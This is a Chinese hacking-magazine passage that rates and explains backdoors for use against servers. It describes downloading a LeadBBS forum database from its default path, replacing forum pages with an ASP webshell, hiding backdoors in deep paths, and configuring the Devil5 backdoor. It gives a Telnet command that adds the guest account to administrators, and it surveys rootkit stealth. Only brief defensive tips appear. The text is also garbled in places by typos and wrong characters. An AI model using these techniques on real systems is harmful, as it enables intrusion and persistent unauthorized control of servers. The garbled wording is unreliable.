查杀难度：★★★☆☆
服务器系统配置都相对安全，公开的系统漏洞存在的机会很少，于是脚本方面的漏洞就开始火起来。首先我们通过某种途径获得一个服务器的页面权限(比如利用论坛上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定程序)，然后我们可以通过简单的上传ASP程序或者是直接复制海阳项端的代码，然后通过WEB访问这个程序，就能很方便地查阅服务器上的资料了，下面举个简单的便子(由于只是简单的介绍，下文便子不会太难或者太普遍，希望大家理解)。
leadbbs2.77曾经风靡网络，它是个很典型的ASP论坛，屏蔽了很多可以SQL注入的寺方，但是很多傻瓜级别的网络管理员总是喜欢默认安装，然后启用论坛，我们只需要很简单地在IE中输入：WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该论坛的数据库了，而且没有MD5加密哦!，我们直接找到管理员的账户和密码，然后登录论坛，到管理界面将论坛的“联系我们”、“帮助”等ASP文件替换成我们的海阳项端代码，然后执行GUEST权限的CMD命令，方便的上传/下载将定程序、远程执行程序等，这样一个隐藏的后门就建好了!取得服务器的SYSTEM权限就看大家自己的办法了。
一般来讲，海洋的功能是非常强大的，而且不容易被查杀(一个朋友采取的方式是：先利用某个脚本漏洞上传网页后门，再通过海洋上传另一个后门到隐蔽的路径，然后通过最后上传的后门来删除第一次上传的海洋，这样后门的存放路径就可以放得非常深了，普通管理员是很难发现的)，如果管理员觉得自己可能中了这里边样的后门，可以利用论坛备份来恢复自己的页面系统，再配合系统日志、论坛日志等程序检查系统，发现可疑ASP文件打开看看海洋是很好识别的，再删除就可以了。
脚本方面的后门还有CGI和PHP两面三刀大类，使用原理都差不多，这里就不再多介绍，在黑防论坛也收录了这三种后门，大家可以下载后自己研究。 类型：系统后门
使用范围：win200/xp/2003
隐蔽程度：★★★★☆
使用难度：★★☆☆☆
危害程序：★★★★☆
查杀难度：★★★☆☆
同BITS一样，Devil5也是线程插入式的后门，和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程，适合对系统有一定了解的使用都使用，由于是自定义插入线程，所以它更难被查杀，下面我们来看看它的使用。
道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制，一般设置成系统自带的SVCHOST，然后运行后门就可以控制了。
我们用TELNET连接上去，连接的格式是：TELNET *** 定制的端口，它和其他后门不同之处在于连接后没有提示的界面，每次执行程序也是分开的，必须要每次都有输入密码，比如我们丢掉了服务器和管账户，可以激活GUEST后再将GUEST加到管理员权限，记得每次执行命令后加上“>密码”就可以了：net localgroup administrators guest /add >hkfx，然后你又可以控制服务器了。
很明显示，同榕哥的BITS相比，DEVIL5有一些缺陷：不能通过系统自带端口通讯、执行命令比较麻烦，需要每次输入密码而且不回显示输入内容，很容易出错。但是，它有自己的优势：插入线程可以自已定制，比如设置IE的线程为插入的目标就比较难被查杀：自己提供了专门的查杀工具DELDEVIL5.exe，帮助防护者清理系统;而且它可以任意改名和绑定，使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。
另外，PortLess BackDoor等工具也是此类的后门，功能强大，隐蔽性稍差，大家有兴趣可以自己研究一下。 如果说上面的后门程序都各有千秋、各有所长的话，它们和经典的root kit 一比简直就是小巫见大巫了，那究竟什么样是root kit呢?
root kit出现于20世纪90年代初，在1994年2月的一篇安全咨询报告中首先使用了root kit这个名词。从出现至今，root kit 的技术发展非常迅速，应用越来越广泛，检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的root kit最多。
很多人有一个误解，他们认为root kit 是用作获得系统root访问权限的工具。实际上，root kit是攻击都用来隐蔽自己的踪迹和保留root访问权限的工具。通常，攻击者通过远程攻击获得root访问权限，进入系统后，攻击者会在侵入的主机中安装root kit，然后他将经常通过root kit的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过root kit的嗅探器获得其他系统的用户和密码之后，攻击者就会利用这些信息侵入其他系统。
从*nix系统上迁移到windows系统下的root kit完全沿袭了这些“可怕”的功能!网络上常见的root kit 是内核级后门软件，用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。程序同时也在内存中伪装它所做的改动，并且隐身地控制被隐藏进程。程序安装隐藏后门，注册隐藏系统服务并且安装系统驱动。该后门技术允许植入reDirector，是非常难以查杀的一个东东，让很多网络管员非常头疼!